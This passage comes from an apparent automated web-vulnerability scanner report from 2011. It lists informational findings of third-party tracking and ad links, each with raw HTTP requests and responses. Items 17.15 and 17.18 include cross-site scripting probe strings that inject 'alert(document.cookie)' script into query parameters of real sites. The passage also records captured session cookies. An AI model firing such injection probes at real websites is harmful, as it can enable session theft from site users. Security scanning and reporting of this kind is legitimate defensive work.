<img src="http://image2.pubmatic.com/AdServer/Pug?vcode=bz0yJnR5cGU9MSZjb2RlPTM2MiZ0bD0xNTc2ODAw&piggybackCookie=110" height="1" width="1">
<img src="http://tag.admeld.com/pixel?admeld_adprovider_id=296&_custom-rem=110&expiration=21days" height="1" width="1"><!-- Google Code for Homepage Clearance Remarketing List -->
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...
<div style="display:inline;">
<img height="1" width="1" style="border-style:none;" alt="" src="http://www.googleadservices.com/pagead/conversion/1052618686/?label=r4HzCLaPpQEQvt_29QM&amp;guid=ON&amp;script=0"/>
</div>
</noscript><script src="http://action.media6degrees.com/orbserv/hbjs?pixId=5204&pcv=30" type="text/javascript"></script>
...[SNIP]...

17.12. http://fls.doubleclick.net/activityi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /activityi

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /activityi;src=1774243;type=trave073;cat=trave980;u3=tgdirect;u4=000329;u8=us_direct;u9=Live;ord=1;num=738394770305.6038? HTTP/1.1
Host: fls.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.travelguard.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Mon, 16 May 2011 01:54:40 GMT
Expires: Mon, 16 May 2011 01:54:40 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
X-XSS-Protection: 1; mode=block
Content-Length: 1893

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><img src="https://idcs.interclick.com/Segment.aspx?sid=ebfeaede-d45a-4e04-bc2f-e258bb5571d4"/><img src="https://ad.yieldmanager.com/pixel?id=1209577&t=2" width="1" height="1" /><img height="1" width="1" style="border-style:none;" alt="" src="https://www.googleadservices.com/pagead/conversion/1033198129/?label=2_0xCJXK8gEQsbTV7AM&amp;guid=ON&amp;script=0"/><img src="https://tag.yieldoptimizer.com/ps/ps?t=i&p=1087&" width="1" height="1" />
<img src="https://tag.yieldoptimizer.com/ps/sync?t=i&p=1087&w=true&r=1" width="1" height="1" />
<img src="https://tag.yieldoptimizer.com/ps/sync?t=i&p=1087&w=true&r=2" width="1" height="1" />
<img src="https://tag.yieldoptimizer.com/ps/sync?t=i&p=1087&w=true&r=3" width="1" height="1" /><script type="text/javascript">
...[SNIP]...
</script>
<script type="text/javascript" src="https://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...
<div style="display:inline;">
<img height="1" width="1" style="border-style:none;" alt="" src="https://www.googleadservices.com/pagead/conversion/1022426391/?label=VBLKCKG-wwEQl_rD5wM&amp;guid=ON&amp;script=0"/>
</div>
</noscript><img width="1" height="1" src="https://secure.media6degrees.com/orbserv/hbpix?pixId=3277" /><img src="https://securetags.w55c.net/rs?id=f41f7ddceca24ce884b754560c63aed4&t=marketing" />
<img height="1" width="1" style="border-style:none;" alt="" src="https://seg.sharethis.com/socialOptimizationPixel.php?campaign=RT-travel_guard"/></body>
...[SNIP]...

17.13. http://fls.doubleclick.net/activityi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /activityi

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /activityi;src=2079557;type=count386;cat=homef166;ord=1;num=9342936133034.527? HTTP/1.1
Host: fls.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Mon, 16 May 2011 01:53:50 GMT
Expires: Mon, 16 May 2011 01:53:50 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
X-XSS-Protection: 1; mode=block
Content-Length: 1783

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><img src="http://switch.atdmt.com/action/Toshiba_Homepage" height="1" width="1"><img src="http://media.fastclick.net/w/tre?ad_id=20480;evt=12869;cat1=14057;cat2=14058" width="1" height="1" border="0"><img src="http://leadback.advertising.com/adcedge/lb?site=695501&srvc=1&betr=toshiba_cs=1&betq=11505=422668" width = "1" height = "1" border = "0"><img src="http://leadback.advertising.com/adcedge/lb?site=695501&srvc=1&betr=tosh_cs=1&betq=7046=395215" width = "1" height = "1" border = "0"><img src='http://a.tribalfusion.com/i.cid?c=294813&d=30&page=landingPage' width='1' height='1' border='0'><IMG SRC="http://bp.specificclick.net?pixid=99007235" width=0 height=0 border=0><img border="0" src="http://r.turn.com/r/beacon?b2=Z6z3HD7Ka9PFm_lTPlcJyUlQ-yO37BfURcbb7BumEMQAutjTrrs_D_o0Lv3V9pAvJVMIOj2uDziSnc27IJcNQA&cid="><img src="http://ads.revsci.net/adserver/ako?rsi_noads=1&rsi_pixel=1&rsi_account=A55F91532C5B5ECBD7EA17754C90B7F6&rsi_site=321B4F74F24F8AB84A6B7335C286B21E&rsi_event=BE74CE476C51EE46644ACD25F8AFAFD4"/><script type="text/javascript">
...[SNIP]...
</script><img src="http://www.burstnet.com/enlightn/5562//F24E/" width="0" height="0" border="0"></body>
...[SNIP]...

17.14. http://hire.jobvite.com/CompanyJobs/Careers.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hire.jobvite.com
Path:   /CompanyJobs/Careers.aspx

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /CompanyJobs/Careers.aspx?c=qlZ9Vfw8 HTTP/1.1
Host: hire.jobvite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=am2qlgznv2utc045d0xr1hr3; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: guestidc=5ca2bcbf-4c16-4cf2-b0d2-57e62d1c65f1; expires=Wed, 15-Jun-2011 10:22:19 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 10:22:19 GMT
Content-Length: 40128

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<link href="http://hir
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.linkedin.com/companyInsider?script&useBorder=no"></script>
...[SNIP]...
</TITLE>
<base href="http://www.bluenile.com" />
<link rel="shortcut icon" href="http://www.bluenile.com/favicon.ico" />
<meta name="description" content="Career opportunities are listed by department."/>
...[SNIP]...
<meta http-equiv="Content-Type" content="text/html;charset=UTF-8"/>

   <link rel="stylesheet" type="text/css" media="screen, print" href="http://pics.bluenile.com/1675544779/bundles/allpages.css" />

<script type="text/javascript" src="http://pics.bluenile.com/1166193570/bundles/core.js" ></script>

<script type="text/javascript" src="http://pics.bluenile.com/442036000/js/ga.js" ></script>
...[SNIP]...
</div>


                   <script type="text/javascript" src="http://pics.bluenile.com/N877218625/bundles/allpages.js" ></script>

   
   <script type="text/javascript" src="http://pics.bluenile.com/1495474762/js/navigation_flyouts_menu.js" ></script>
...[SNIP]...
<div class="breadcrumbs"><A HREF="http://www.bluenile.com/default.jsp">Home</A>&nbsp;>&nbsp;<A HREF="http://www.bluenile.com/about-blue-nile"><div class="breadcrumb">
...[SNIP]...
<br />
Blue Nile, Inc. is the leading online retailer of <a href="http://www.bluenile.com/diamonds" target="_blank">diamonds</a> and fine jewelry. The Company delivers the ultimate customer experience, providing consumers with a superior way to buy <a href="http://www.bluenile.com/engagement-rings" target="_blank">engagement rings</a>
...[SNIP]...
<div class="column first">
                   <a href="http://www.bluenile.com/where_we_ship.jsp" class="title">
                       <span class="text">
...[SNIP]...
<span class="image"><img width="10" height="10" src="http://investor.bluenile.com/images/but_arrow_shad_sm_10x10.gif"></span>
...[SNIP]...
<div class="footer_flag_icon">
                       <a href="http://www.bluenile.com/default.jsp?curr=USD&amp;pre_context=53">
                           <img width="26" height="17" align="absmiddle" border="0" src="http://investor.bluenile.com/images/item_icon_us_flag_shad.gif"></a>
...[SNIP]...
<div class="footer_flag_icon">
                       <a href="http://www.bluenile.ca/default.jsp?curr=CAD&amp;pre_context=38">
                           <img width="26" height="17" align="absmiddle" border="0" src="http://investor.bluenile.com/images/item_icon_ca_flag_shad.gif"></a>
...[SNIP]...
<div class="footer_flag_icon">
                       <a href="http://www.bluenile.co.uk/default.jsp?curr=GBP&amp;pre_context=37">
                           <img width="26" height="17" align="absmiddle" border="0" src="http://investor.bluenile.com/images/item_icon_gbr_flag_shad.gif"></a>
...[SNIP]...
<div class="column">
                   <a href="http://www.bluenile.com/about-blue-nile" class="title">
                       <span class="text">
...[SNIP]...
<span class="image"><img width="10" height="10" src="http://investor.bluenile.com/images/but_arrow_shad_sm_10x10.gif"></span>
...[SNIP]...
<li><a href="http://www.bluenile.com/jobs_channel.jsp">Careers</a>
...[SNIP]...
<li><a href="http://www.bluenile.com/blue-nile-quality-value">Quality &amp; Value</a>
...[SNIP]...
<li><a href="http://www.bluenile.com/sitemap">Site Map</a>
...[SNIP]...
<li><a href="http://www.bluenile.com/blue-nile-in-the-news">In the News</a>
...[SNIP]...
<li><a href="http://www.bluenile.com/blue-nile-awards">Awards &amp; Reviews</a>
...[SNIP]...
<div class="column">
                   <a href="http://www.bluenile.com/services.jsp" class="title">
                       <span class="text">
...[SNIP]...
<span class="image"><img width="10" height="10" src="http://investor.bluenile.com/images/but_arrow_shad_sm_10x10.gif"></span>
...[SNIP]...
<li><a href="http://www.bluenile.com/shipping.jsp">Free FedEx&reg; Shipping</a>
...[SNIP]...
<li><a href="http://www.bluenile.com/packaging.jsp">Free Gift Packaging</a>
...[SNIP]...
<li><a href="http://www.bluenile.com/returns.jsp">30-Day Returns</a>
...[SNIP]...
<li><a href="http://www.bluenile.com/jewelry-appraisal">Jewelry Appraisals</a>
...[SNIP]...
<li><a href="http://www.bluenile.com/services_channel.jsp">Financing &amp; Insurance</a>
...[SNIP]...
<div class="column">
                   <a href="http://www.bluenile.com/contact-blue-nile" class="title">
                       <span class="text">
...[SNIP]...
<span class="image"><img width="10" height="10" src="http://investor.bluenile.com/images/but_arrow_shad_sm_10x10.gif"></span>
...[SNIP]...
<div class="column last">
                   <a href="http://www.bluenile.com/sweepstakes.jsp" class="title">
                       <span class="text">
...[SNIP]...
<span class="image"><img width="10" height="10" src="http://investor.bluenile.com/images/but_arrow_shad_sm_10x10.gif"></span>
...[SNIP]...
<div class="vat">
                   <a href="http://www.facebook.com/pages/Blue-Nile/5873063513?v=wall"><img width="16" height="16" src="http://investor.bluenile.com/images/bug_facebook_16x16.jpg"></a>
                   <a href="http://www.facebook.com/pages/Blue-Nile/5873063513?v=wall"><font style="color: rgb(0, 102, 153); font-weight: 900;">
...[SNIP]...
<p>&copy; 1999-2010, Blue Nile, Inc.<a href="http://www.bluenile.com/privacy.jsp">Privacy Policy</a>
       <a href="http://www.bluenile.com/product_policies.jsp">Terms and Conditions</a>
...[SNIP]...
<li><a rel="nofollow" href="http://www.bluenile.com/paypal.jsp"><img width="59" height="23" alt="PayPal" src="http://investor.bluenile.com/images/PP.jpg"></a>
...[SNIP]...
<li><a rel="nofollow" href="http://www.bbbonline.org/cks.asp?id=1296000087"><img width="20" height="35" alt="BBB" src="http://investor.bluenile.com/images/logo2.jpg"></a>
...[SNIP]...
<li><a rel="nofollow" href="http://www.bizrate.com/ratings_guide/merchant_detail__mid--24298.html"><img width="87" height="44" alt="Biz Rate 2009" src="http://investor.bluenile.com/images/bizRate.jpg"></a>
...[SNIP]...
<li><a rel="nofollow" href="http://quotes.nasdaq.com/asp/summaryquote.asp?mode=stock&amp;symbol=NILE&amp;selected=NILE"><img width="70" height="36" alt="Nasdaq" src="http://investor.bluenile.com/images/NSDQ.jpg"></a>
...[SNIP]...
<li><a rel="nofollow" href="https://seal.verisign.com/splash?form_file=fdf/splash.fdf&amp;dn=SECURE.BLUENILE.com&amp;lang=en"><img width="53" height="34" alt="Verisign" src="http://investor.bluenile.com/images/verisign.jpg"></a>
...[SNIP]...
<li><a rel="nofollow" href="https://www.securecheckout.billmelater.com/paycapture-content/fetch?hash=PAP288AN&amp;content=/bmlweb/np90drollingiw.html"><img width="64" height="39" alt="Bill Me Later" src="http://investor.bluenile.com/images/billme.jpg"></a>
...[SNIP]...

17.15. http://html.aggregateknowledge.com/iframe

Summary

Severity:   Information
Confidence:   Certain
Host:   http://html.aggregateknowledge.com
Path:   /iframe

Issue detail

The page was loaded from a URL containing a query string. The response contains the following link to another domain:

Request

GET /iframe?wid=2&xwid=GNC&uniqueURL=http://www.gnc.com/cmsTemplates/gnc_09_home_1v1.jsp?c5205--%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3Ebb446d17c91=1&senduuid=1 HTTP/1.1
Host: html.aggregateknowledge.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.gnc.com/home/index.jsp?c5205--%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3Ebb446d17c91=1
Cookie: uuid=1096126108310753991; u=5|0AARbQzAAABAABAIAEOFTAAAAIAANABDhUwAAACAADQ%3D%3D

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: uuid=1096126108310753991; Version=1; Domain=.aggregateknowledge.com; Max-Age=157680000; Expires=Sat, 14-May-2016 10:57:24 GMT; Path=/
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: u=5|0AQRbQzEAABAABQIAEOFTAAAAIAANABDhUwAAACAADQEAAQEAgA%3D%3D; Version=1; Domain=.aggregateknowledge.com; Max-Age=63072000; Expires=Wed, 15-May-2013 10:57:24 GMT; Path=/
Cache-Control: max-age=0, must-revalidate
Pragma: no-cache
Expires: Thu, 1 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Content-Length: 402
Date: Mon, 16 May 2011 10:57:24 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">


<html>
<head>
<meta http-equiv="pragma" content="no-cache">
</head>

<body style="border: 0; margin: 0; padding: 0;">


<img src=http://www.gnc.com/recommendationpixel/user.jsp?uid=1096126108310753991 height=1 width=1/>


</body>
...[SNIP]...

17.16. https://secure.homedepot.ca/webapp/wcs/stores/servlet/UserRegistrationForm

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.homedepot.ca
Path:   /webapp/wcs/stores/servlet/UserRegistrationForm

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /webapp/wcs/stores/servlet/UserRegistrationForm?langId=-15&storeId=10051&catalogId=10051&new=Y HTTP/1.1
Host: secure.homedepot.ca
Connection: keep-alive
Referer: http://www.homedepot.ca/webapp/wcs/stores/servlet/Home?storeId=10051&catalogId=10051&langId=-15
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=135472616.1305510002.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RES_TRACKINGID=989860238041728; hd_search_cookie=1; localRegion=446%2C7080%2CToronto%2C43.6687%2C-79.3382; s_vi=[CS]v1|26E840400507A189-40000102A0090C5F[CE]; __utma=135472616.1475317367.1305510002.1305510002.1305510002.1; __utmc=135472616; __utmb=135472616.2.10.1305510002; RES_SESSIONID=223896591225639; ResonanceSegment=1; s_cc=true; fsr.s={"v":1,"rid":"1305510029454_909320","to":5,"c":"http://www.homedepot.ca/webapp/wcs/stores/servlet/Home","pv":2,"lc":{"d0":{"v":2,"s":false}},"cd":0,"sd":0,"f":1305510812715}; s_v14=English; s_sq=homedepotca%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttps%25253A%25252F%25252Fsecure.homedepot.ca%25252Fwebapp%25252Fwcs%25252Fstores%25252Fservlet%25252FUserRegistrationForm%25253FlangId%25253D-15%252526storeId%25253D10051%252526%2526ot%253DA

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Date: Mon, 16 May 2011 02:10:38 GMT
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: WCS_UNIQUE_ID=HCa6Eud8L9hN21YyVUS%2bHaSDQgY%3d%0a; Path=/
Set-Cookie: WC_SESSION_ESTABLISHED=true; Path=/; Domain=.homedepot.ca
Set-Cookie: WC_ACTIVESTOREDATA=%2d15%2c10051; Path=/; Domain=.homedepot.ca
Set-Cookie: WC_AUTHENTICATION_-1002=%2d1002%2crW6rzz%2fYGsIblj6FaaWMw7l8O7Y%3d; Path=/; Domain=.homedepot.ca; Secure
Set-Cookie: WC_USERSESSION_-1002=%2d1002%2c%2d15%2cCAD%2c%2d2000%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c10501%7c10501%7cnull%7c%2d2000%5d%2cSPiv6UKbre34gGrW2piYfWv44EQ%3d; Path=/; Domain=.homedepot.ca
Set-Cookie: JSESSIONID=0001VzTy5fzfDUHAYcFBVD3sOyb:-4C1Q63; Path=/
Cache-Control: no-store, no-cache
Expires: 0
Pragma: no-cache
Content-Length: 75346


       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
...[SNIP]...
<!--
       By use of this code snippet, I agree to the Brightcove Publisher T and C found at https://accounts.brightcove.com/en/terms-and-conditions/.
       -->
       
       <script language="JavaScript" type="text/javascript" src="https://sadmin.brightcove.com/js/BrightcoveExperiences_all.js"></script>
...[SNIP]...
</script>
       
               
       <script src="//www.mapquestapi.com/sdk/js/v6.0.0/mqa.toolkit.js?key=Gmjtd%7Clu6tn16zng%2C20%3Do5-lw2a1"></script>
...[SNIP]...

17.17. https://secure.orientaltrading.com/ui/userProfile/processRequest.do

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.orientaltrading.com
Path:   /ui/userProfile/processRequest.do

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /ui/userProfile/processRequest.do?requestURI=displayLogin HTTP/1.1
Host: secure.orientaltrading.com
Connection: keep-alive
Referer: http://www.orientaltrading.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=17jLNQBXSqTLZLn22gSGhQZ1qn1JzhCKMpsNG12T0S6Y29Lzpcvx!-2120161015; otc_visitor_id=U6c411c8e35469d5c3d093388c1dc89a2; otc_new_mktg_visitor=21758503; CoreM_State=61~1.0~-1~-1~E~3~3~5~3~3~7~7~|~~|~~|~~|~||||||; mt.v=1.322159034.1305510206640; fsr.s={"v":1,"rid":"1305510222528_763877","pv":2,"to":5,"c":"http://www.orientaltrading.com/","lc":{"d0":{"v":2,"s":true}},"cd":0,"sd":0,"f":1305510848788}

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:16:41 GMT
Server: Apache
Set-Cookie: JSESSIONID=LSR0NQ5JncTchv2GrGWHyGDfvFpDKhs5c5ThHL92VQvcmKBTQLms!-2120161015; domain=.orientaltrading.com; path=/; HttpOnly
X-Powered-By: Servlet/2.5 JSP/2.1
Keep-Alive: timeout=30
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Content-Length: 85683


                                       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


       
...[SNIP]...
<a onclick="window.open('https://www.mcafeesecure.com/RatingVerify?ref=www.orientaltrading.com','mcafee','width=550, height=450,resizable,scrollbars=yes'); return false;" href="javascript: void(0)"><img width="65" height="37" alt="McAfee Secure sites help keep you safe from identity theft, credit card fraud, spyware, spam, viruses and online scams" src="//images.scanalert.com/meter/www.orientaltrading.com/55.gif"></a>
...[SNIP]...
</script>
<script type="text/javascript" src="https://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...
<div style="display:inline;">
<img height="1" width="1" style="border-style:none;" alt="" src="https://www.googleadservices.com/pagead/conversion/1072605278/?label=NzSYCP3Q5QEQ3tC6_wM&amp;guid=ON&amp;script=0"/>
</div>
...[SNIP]...

17.18. http://t.p.mybuys.com/webrec/wr.do

Summary

Severity:   Information
Confidence:   Certain
Host:   http://t.p.mybuys.com
Path:   /webrec/wr.do

Issue detail

The page was loaded from a URL containing a query string. The response contains the following link to another domain:

Request

GET /webrec/wr.do?client=ARMANIEXCHANGE&sessionId=6451B347-829F-5F10-0394-7AA048201BB1&pt=hcat&categoryname=Womens&ckc=2f479%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ef3b7e714c62&mbcc=736A768E-F798-53C9-B056-8FE338824CC8&lang=en&v=4.7.3&mbts=1305510843775&purl=http%3A%2F%2Fwww.armaniexchange.com%2Fcategory%2Fwomens.do HTTP/1.1
Host: t.p.mybuys.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: JSESSIONID=8E961945455EB2FBD923D2E9DDFEFCDF; mbc=sOgnt6NbgmSE4h1NwgmFVV1XNaZXwyoF

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 11:05:04 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Set-Cookie: mbc=""; Domain=.mybuys.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mbc=sOgnt6NbgmSE4h1NwgmFVV1XNaZXwyoF; Domain=.mybuys.com; Expires=Sat, 03-Jun-2079 14:19:11 GMT; Path=/
Vary: Accept-Encoding
P3P: CP="DSP CAO DEVo TAI PSD IVDo IVAo CONo HISo CUR PSA OUR IND NAV COM UNI INT", policyref="/w3c/p3p.xml"
Accept-Ranges: bytes
Cache-Control: no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
x-cdn: Cotendo
Connection: Keep-Alive
Content-Length: 512

<html>
<body>
<iframe width="0" height="0" frameborder="0" id="mbadn" scrolling="no" style="display: none;" src="http://adserver.veruta.com/track.fcgi?merchantid=854445219&category=2f479"><script>al
...[SNIP]...

17.19. http://t.p.mybuys.com/webrec/wr.do

Summary

Severity:   Information
Confidence:   Certain
Host:   http://t.p.mybuys.com
Path:   /webrec/wr.do

Issue detail

The page was loaded from a URL containing a query string. The response contains the following link to another domain:

Request

GET /webrec/wr.do?client=ARMANIEXCHANGE&sessionId=6451B347-829F-5F10-0394-7AA048201BB1&pt=hcat&categoryname=Womens&ckc=100199&mbcc=736A768E-F798-53C9-B056-8FE338824CC8&lang=en&v=4.7.3&mbts=1305510850857&purl=http%3A%2F%2Fwww.armaniexchange.com%2Fcategory%2Fwomens.do HTTP/1.1
Host: t.p.mybuys.com
Proxy-Connection: keep-alive
Referer: http://www.armaniexchange.com/category/womens.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0ABF178ECF2EF06E0F8D4A7104A9B52A; mbc=sOgnt6NbgmSE4h1NwgmFVV1XNaZXwyoF

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:54:17 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Set-Cookie: mbc=""; Domain=.mybuys.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mbc=sOgnt6NbgmSE4h1NwgmFVV1XNaZXwyoF; Domain=.mybuys.com; Expires=Sat, 03-Jun-2079 05:08:24 GMT; Path=/
Vary: Accept-Encoding
P3P: CP="DSP CAO DEVo TAI PSD IVDo IVAo CONo HISo CUR PSA OUR IND NAV COM UNI INT", policyref="/w3c/p3p.xml"
Accept-Ranges: bytes
Cache-Control: no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
x-cdn: Cotendo
Connection: Keep-Alive
Content-Length: 839

<html>
<body>
<iframe width="0" height="0" frameborder="0" id="mbadn" scrolling="no" style="display: none;" src="http://adserver.veruta.com/track.fcgi?merchantid=854445219&category=100199&itemid=&eventid=0&ifmode=1&recommend=%7B%22dc%22%3A%224699979325968%22%2C%22slc%22%3A14%2C%22extra%22%3A%7B%22cl%22%3A%22ARMANIEXCHANGE%22%2C%22cm%22%3A%2220772879917%22%2C%22ts%22%3A%2221758514%22%7D%2C%22rc%22%3A%5B%221849367843%22%2C%2222084645718%22%2C%221849367842%22%2C%2222084642104%22%2C%2219522266448%22%2C%2222084646129%22%2C%2222084645710%22%2C%2222084645561%22%2C%2222084645689%22%2C%2220952419112%22%2C%2219779857694%22%2C%2223186672305%22%2C%2220399498260%22%2C%2220796345994%22%2C%2220796346228%22%2C%2220796346434%22%2C%2219522267016%22%2C%2220796346298%22%2C%2220796346442%22%2C%2219522266459%22%5D%7D"></iframe>
...[SNIP]...

17.20. http://t.p.mybuys.com/webrec/wr.do

Summary

Severity:   Information
Confidence:   Certain
Host:   http://t.p.mybuys.com
Path:   /webrec/wr.do

Issue detail

The page was loaded from a URL containing a query string. The response contains the following link to another domain:

Request

GET /webrec/wr.do?client=ARMANIEXCHANGE&sessionId=6451B347-829F-5F10-0394-7AA048201BB1&pt=hcat&categoryname=Womens&ckc=100199&mbcc=736A768E-F798-53C9-B056-8FE338824CC8&lang=en&v=4.7.3&mbts=1305510843775&purl=http%3A%2F%2Fwww.armaniexchange.com%2Fcategory%2Fwomens.do HTTP/1.1
Host: t.p.mybuys.com
Proxy-Connection: keep-alive
Referer: http://www.armaniexchange.com/category/womens.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=B4DF5DD64853B60409638EF60D0B5CE6; mbc=sOgnt6NbgmSE4h1NwgmFVV1XNaZXwyoF

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:58:13 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
